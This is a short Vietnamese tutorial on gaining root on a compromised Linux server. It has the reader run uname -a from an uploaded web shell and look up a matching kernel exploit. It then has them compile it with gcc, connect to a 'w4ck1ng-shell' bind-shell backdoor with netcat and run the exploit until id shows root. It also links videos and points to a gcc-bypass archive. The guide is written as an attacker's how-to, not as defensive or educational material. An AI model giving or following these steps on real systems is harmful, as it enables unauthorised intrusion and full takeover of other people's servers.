Skip to main content

Căn Bản Get Root

Công cụ:
Shell
Netcat
Exploit
Đầu tiên trong ô run command của shell gõ:
uname -a
Nó sẽ hiện ra phiên bản linux:
Linux 2.6.18-194.11.1.el5PAE #1 SMP Tue Aug 10 19:48:16 EDT 2009 i686 i686 i386 GNU/Linux
Chúng ta search exploit này, sau đó lưu dưới dạng file.c
Run command:
gcc filename.c -o filename
Mở hết quyền cho file này:
chmod 777 filename
Bất netcat đã mở cổng và backdoor từ shell:
C:\nc
nc IP port
ex:
nc 127.0.0.1 7777
Nếu thành công thì sẽ hiện:
:: w4ck1ng-shell (Private Build v0.3) bind shell backdoor ::
Tiếp tục:
id
Nó sẽ hiện
id=99(nobody) gid=99(nobody)
Và bây giờ dùng exploit getroot:
./file
Tiếp tục:
id
Khi nó hiện:
id=root gid=root groups=root
là thành công!

1 so video get root
http://wn.com/qinory
http://77.120.120.218/
--------------
Nếu khóa gcc
thì bypassgcc.zip

Share